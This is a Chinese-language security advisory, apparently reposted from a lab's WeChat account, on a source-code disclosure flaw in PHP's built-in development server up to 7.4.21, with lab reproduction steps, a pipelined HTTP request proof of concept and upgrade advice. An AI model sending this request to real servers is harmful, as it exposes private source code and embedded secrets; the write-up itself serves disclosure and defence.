PHP Development Server存在源码泄露漏洞

admin 2024年12月3日22:49:49评论27 views字数 902阅读3分0秒阅读模式

PHP Development Server存在源码泄露漏洞

概述

PHP Development Server 上存在一个安全漏洞,它可能会将 PHP 文件的源代码暴露为静态文件,而不是按照预期的方式执行它们,从而导致php网站的源码泄露。

Chapter 01

影响版本

PHP Development Server <= 7.4.21

Chapter 02

复现步骤

1、本地启动一个php的web服务

 php -S 192.168.184.148:8000

写一个php文件,test.php

 <?php //flag{STARNET LABS_yyds!!!!!!!!!!!!} echo 'STARNET LABS'; phpinfo(); ?>

正常访问网站

PHP Development Server存在源码泄露漏洞

  1. 测试poc

 GET /test.php/ HTTP/1.1 Host: 192.168.184.148:8000 Connection: close GET /aaa.test HTTP/1.1

关闭burp的Update Content-Length

PHP Development Server存在源码泄露漏洞

PHP Development Server存在源码泄露漏洞

测试发现,可以看到源码

PHP Development Server存在源码泄露漏洞

Chapter 03

修复方案

1、官方已经在新版php中修复该漏洞,可升级到修复版本以修复该问题;

2、生产环境不要使用PHP Development Server作为web服务器。

-=[感·谢·阅·读]=-

关于我们

星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。

原文始发于微信公众号(星网实验室):PHP Development Server存在源码泄露漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月3日22:49:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP Development Server存在源码泄露漏洞https://cn-sec.com/archives/1864457.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息